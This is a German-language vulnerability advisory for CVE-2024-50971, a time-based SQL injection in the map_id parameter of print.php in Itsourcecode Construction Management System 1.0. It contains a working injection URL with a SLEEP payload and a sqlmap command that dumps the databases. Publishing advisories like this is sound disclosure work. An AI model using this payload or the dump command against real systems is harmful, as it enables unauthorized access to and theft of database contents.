CVE-2024-50971
Beschreibung
Eine SQL-Injection-Schwachstelle in print.php des Itsourcecode Construction Management System 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter map_id auszuführen.
Schwachstellentyp
SQL Injection
Anbieter des Produkts
Itsourcecode
Betroffene Produktcodebasis:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Betroffene Komponente:
Das Itsourcecode Construction Management System v1.0 ist anfällig für SQL-Injection über den Parameter map_id auf der Seite print.php.
Angriffsvektoren:
- Richten Sie die Anwendung lokal ein, registrieren Sie ein Konto und melden Sie sich mit den Admin-Anmeldedaten admin:admin an.
- Navigieren Sie in Ihrem Browser zur folgenden URL:
http://localhost/monitoring_system/print.php?map_id=67
- SQL-Payload injizieren:
Ändern Sie den Parameter map_id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen.
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- Beobachten Sie die Antwort der Anwendung:
Die Seite sollte bei erfolgreicher Injection deutlich länger (15 Sekunden) zum Laden benötigen, was bestätigt, dass der Parameter map_id anfällig für SQL-Injection ist.
- Verwenden Sie nun das SQLMap-Tool zur weiteren Ausnutzung und zum Dumping von Datenbanken mit dem folgenden Befehl:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Referenzen:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection